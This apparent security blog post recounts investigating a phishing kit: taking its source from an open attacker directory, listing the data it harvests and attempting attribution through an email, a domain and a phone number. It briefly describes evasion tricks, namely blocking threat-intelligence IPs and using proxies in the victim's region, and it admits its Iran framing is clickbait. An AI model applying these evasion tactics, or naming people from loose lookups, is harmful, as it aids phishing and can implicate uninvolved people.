Uncovering an Iranian Phishing Attack.
There has been a recent wave of phishing attacks hitting Silicon Valley lately, these attacks have been very effective at spreading and compromising companies. Being familiar with these sort of things, I decided to take a closer look.
Fortunately, the appears that the people behind these attacks don’t understand how chmod works, since I was able to traverse through their directories and quickly steal their source code which they just happened to leave nicely packed in a .zip file for me. Very polite and hospitable of them!
A quick look at the source code showed me the email address that all information was being sent to. They seem to be capturing credentials, IP Addresses, phone numbers and recovery emails. Blackhats capture IP Addresses so they can later use a proxy in the same region as the victim, as to not raise any red flags in mail systems.
A quick search on HackForums to see who ‘NoBODY’ is leads to a dead end. For people who don’t understand basic OPSEC and file permissions they seem to be very self-aware and experienced in phishing. In the source code they are blocking IP Addresses whose hostnames are affiliated with Threat Intelligence companies such as Cyveillance and Phishtank. It is possible that the attacker is not the owner of this source code, and is just a script kiddy that bought the code from NoBODY. This sort of blackmarket entrepreneurship is nothing new, as we have seen with the ransomware moving towards SaaS. Okay, now let’s look up the generic email address…
The poor chap registered a domain name(which is now defunct)! Poor guy, didn’t you learn OPSEC from Grugq? The registered address is fake, but this guy seems to be Iranian. Is this a state-sponsored attack backed by Iran? Most likely not, but my clickbait title did it’s job and you’re almost at the end of the article anyways!
Using a phone lookup tool created by an old friend leads me to find someone who used to own the phone number, but is really just some economist in North Carolina, not the man I’m looking for.
Welp, nothing I can do from here, it’s probably just a Google Voice number anyways. I guess we’ll all have to wait for Brian Krebs to unveil them in a few months. Until next time!
